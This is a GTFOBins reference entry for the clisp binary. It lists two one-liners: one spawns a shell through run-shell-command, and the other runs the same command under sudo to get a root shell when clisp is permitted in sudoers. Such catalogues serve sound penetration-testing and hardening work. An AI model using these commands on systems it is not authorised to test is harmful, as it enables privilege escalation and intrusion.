GTFOBins.github.io/_gtfobins/clisp.md

8 lines
167 B
Markdown
Raw Normal View History

2024-11-11 14:22:54 +01:00
---
functions:
shell:
- code: clisp -x '(ext:run-shell-command "sh") (ext:exit)'
sudo:
- code: sudo clisp -x '(ext:run-shell-command "sh") (ext:exit)'
---